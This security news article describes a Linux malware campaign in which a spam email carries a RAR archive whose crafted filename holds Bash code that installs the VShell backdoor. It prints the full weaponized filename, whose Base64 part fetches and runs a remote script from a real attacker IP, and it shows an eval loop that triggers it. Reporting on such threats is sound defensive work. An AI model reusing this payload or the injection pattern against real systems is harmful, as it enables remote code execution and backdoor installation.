Linux environments, long considered bastions of security, are facing a sophisticated new threat that challenges traditional assumptions about operating system safety.
A recently discovered malware campaign exploits an ingenious attack vector that weaponizes RAR archive filenames to deliver the VShell backdoor, demonstrating how attackers are evolving beyond conventional exploitation techniques to target scripting patterns and file metadata.
The attack begins with a seemingly innocuous spam email disguised as a beauty product survey invitation, offering a small monetary reward to entice victims.
Unlike traditional phishing campaigns that focus on credential theft or brand impersonation, this social engineering approach exploits user curiosity while delivering a malicious RAR archive attachment.
The archive contains a file with a specially crafted filename that serves as a dormant payload, waiting to execute when processed by common shell operations.
What makes this attack particularly insidious is its exploitation of dangerous patterns prevalent in Linux shell scripts.
Trellix researchers identified that the malicious filename contains embedded Bash-compatible code designed to execute commands when interpreted by the shell during routine operations such as directory enumeration or file listing.
The filename itself acts as a payload trigger, bypassing traditional security defenses that typically focus on file content rather than metadata.
The weaponized filename follows a complex structure that leverages shell command injection principles.
When extracted, the archive reveals a file named ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash, which cannot be manually created through normal shell input due to its special characters being interpreted as command syntax.
This filename was likely crafted using external tools or programming languages to bypass shell input validation.
Infection Mechanism and Execution Chain
The infection triggers when shell scripts process the malicious filename through common operations like for f in *; do eval "echo $f"; done.
.webp "New Linux Malware With Weaponized RAR Archive Deploys VShell Backdoor 3")
Multiple trigger vectors exist, including file listing operations with eval functions, find commands with eval parameters, and xargs processing with shell expansion.
The embedded payload utilizes a multi-stage approach where the filename evaluates to a Base64-decoded command piped directly to bash.
Once triggered, the initial stage downloads a second-stage script that detects system architecture and fetches the appropriate ELF binary for x86, x64, ARM, or ARM64 systems.
The final payload, VShell, operates entirely in memory using fexecve() to avoid disk-based detection while masquerading as legitimate kernel threads like [kworker/0:2].
This sophisticated evasion technique demonstrates the evolution of Linux-targeted malware toward more stealthy, memory-resident operations that challenge traditional security paradigms.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
